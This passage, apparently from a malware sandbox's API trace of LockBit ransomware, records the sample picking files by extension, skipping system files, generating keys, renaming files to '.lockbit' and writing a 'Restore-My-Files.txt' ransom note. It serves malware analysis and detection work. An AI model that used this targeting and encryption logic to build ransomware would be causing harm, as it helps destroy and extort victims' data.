lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.709] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.709] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199475.WMF") returned 1 [0150.710] lstrcmpiW (lpString1="ntldr", lpString2="J0199475.WMF") returned 1 [0150.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199475.WMF") returned 1 [0150.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199475.WMF") returned -1 [0150.710] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199475.WMF") returned -1 [0150.710] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199475.WMF") returned 1 [0150.710] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199475.WMF") returned -1 [0150.710] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.710] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199475.WMF") returned=".WMF" [0150.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.711] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.711] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.712] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.712] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.712] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.712] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.712] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199475.WMF.lockbit") returned 72 [0150.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199475.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199475.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.716] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.716] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.716] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5252) returned 1 [0150.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.718] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.721] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199475.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199475.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.721] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.721] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.722] free (_Block=0x1fa2ed8) [0150.722] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199475.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.722] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.722] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66031e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x27b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199483.WMF", cAlternateFileName="")) returned 1 [0150.722] lstrcmpiW (lpString1=".", lpString2="J0199483.WMF") returned -1 [0150.722] lstrcmpiW (lpString1="..", lpString2="J0199483.WMF") returned -1 [0150.723] PathFindExtensionW (pszPath="J0199483.WMF") returned=".WMF" [0150.723] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.723] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.724] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.724] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199483.WMF") returned 1 [0150.725] lstrcmpiW (lpString1="ntldr", lpString2="J0199483.WMF") returned 1 [0150.725] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199483.WMF") returned 1 [0150.725] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199483.WMF") returned -1 [0150.725] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199483.WMF") returned -1 [0150.725] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199483.WMF") returned 1 [0150.725] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199483.WMF") returned -1 [0150.725] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.725] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199483.WMF") returned=".WMF" [0150.725] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.725] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.725] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.726] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.727] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199483.WMF.lockbit") returned 72 [0150.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199483.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199483.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0150.728] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.728] malloc (_Size=0x40068) returned 0x3d70450 [0150.728] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10164) returned 1 [0150.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.729] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.734] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199483.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199483.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.734] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.734] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.735] free (_Block=0x1fa2ed8) [0150.735] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199483.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.735] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.735] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.736] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dbde600, ftCreationTime.dwHighDateTime=0x1be3e9a, ftLastAccessTime.dwLowDateTime=0x5655cfd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6dbde600, ftLastWriteTime.dwHighDateTime=0x1be3e9a, nFileSizeHigh=0x0, nFileSizeLow=0x302c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199609.WMF", cAlternateFileName="")) returned 1 [0150.736] lstrcmpiW (lpString1=".", lpString2="J0199609.WMF") returned -1 [0150.736] lstrcmpiW (lpString1="..", lpString2="J0199609.WMF") returned -1 [0150.736] PathFindExtensionW (pszPath="J0199609.WMF") returned=".WMF" [0150.736] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.736] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.737] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.737] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.738] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199609.WMF") returned 1 [0150.738] lstrcmpiW (lpString1="ntldr", lpString2="J0199609.WMF") returned 1 [0150.738] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199609.WMF") returned 1 [0150.738] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199609.WMF") returned -1 [0150.738] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199609.WMF") returned -1 [0150.738] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199609.WMF") returned 1 [0150.738] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199609.WMF") returned -1 [0150.738] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.738] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199609.WMF") returned=".WMF" [0150.739] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.739] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.739] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.740] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.740] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.740] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.740] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.740] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.740] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.740] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.740] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199609.WMF.lockbit") returned 72 [0150.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0199609.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.742] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.742] malloc (_Size=0x40068) returned 0x3df0008 [0150.742] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12332) returned 1 [0150.742] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.742] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.743] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.748] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0199609.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft 